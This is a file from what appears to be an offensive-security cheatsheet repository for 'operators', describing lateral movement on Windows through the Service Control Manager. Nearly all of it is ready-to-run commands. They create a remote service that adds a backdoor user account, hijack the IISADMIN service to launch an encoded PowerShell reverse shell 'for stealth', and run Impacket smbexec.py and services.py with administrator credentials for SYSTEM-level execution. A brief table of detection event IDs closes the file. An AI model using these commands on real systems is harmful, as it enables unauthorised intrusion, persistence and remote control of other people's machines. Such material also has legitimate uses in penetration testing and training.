daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-59-scm-service-manager-lateral-movement.md (2685B)


      1 ---
      2 title: "Attack #59 — SCM Service Manager Lateral Movement"
      3 description: "The Service Control Manager (SCM) allows remote service creation and management via named pipes (\\pipe\\svcctl). An attacker with admin credentials can…"
      4 category: active-directory
      5 subcategory: "Lateral Movement"
      6 tags: ["active-directory", "lateral-movement"]
      7 tools: ["Impacket", "PowerShell"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Seven/⚫ Attack #59 — SCM Service Manager Lateral Movement.md"
     11 ---
     12 # ⚫ Attack #59 — SCM / Service Manager Lateral Movement
     13 
     14 ***
     15 
     16 ## 📖 How It Works
     17 
     18 The Service Control Manager (SCM) allows remote service creation and management via named pipes (`\pipe\svcctl`). An attacker with admin credentials can **create a Windows service** on a remote host that executes arbitrary commands as SYSTEM. This is essentially what `sc.exe` and `smbexec.py` use under the hood.
     19 
     20 ***
     21 
     22 ## ⚙️ Prerequisites
     23 
     24 | Requirement | Detail |
     25 |---|---|
     26 | **Local admin on target** | Required for SCM access |
     27 | **SMB access (port 445)** | SCM operates over named pipes via SMB |
     28 
     29 ***
     30 
     31 ## 💻 Full Commands
     32 
     33 ```powershell
     34 # ── Create remote service ─────────────────────────────────────────────────────
     35 sc.exe \\TARGET create remotesvc binPath= "cmd.exe /c net user hacker P@ss! /add"
     36 sc.exe \\TARGET start remotesvc
     37 sc.exe \\TARGET delete remotesvc
     38 
     39 # ── Modify existing service for stealth ───────────────────────────────────────
     40 sc.exe \\TARGET config IISADMIN binPath= "cmd.exe /c powershell -e <base64_reverse_shell>"
     41 sc.exe \\TARGET stop IISADMIN
     42 sc.exe \\TARGET start IISADMIN
     43 ```
     44 
     45 ```bash
     46 # ── Impacket smbexec.py (service-based, no binary on disk) ───────────────────
     47 smbexec.py corp.local/Administrator:'Password1'@10.10.10.10
     48 
     49 # ── services.py (direct service creation) ─────────────────────────────────────
     50 services.py corp.local/Administrator:'Password1'@10.10.10.10 create -name evilsvc \
     51   -display "Evil" -path "cmd.exe /c whoami > C:\Temp\out.txt"
     52 services.py corp.local/Administrator:'Password1'@10.10.10.10 start -name evilsvc
     53 ```
     54 
     55 ***
     56 
     57 ## 🛡️ Detection — Event IDs
     58 
     59 | Event ID | Source | What to Look For |
     60 |---|---|---|
     61 | **7045** | System Log | New service installed remotely |
     62 | **4697** | Security Log | Service installation |
     63 
     64 ***
     65 
     66 > ✅ **Attack #59 — SCM Lateral Movement complete.**